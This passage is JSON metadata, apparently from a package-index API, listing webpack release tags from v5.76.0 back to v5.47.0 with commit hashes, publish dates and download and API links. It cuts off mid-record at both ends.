:"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5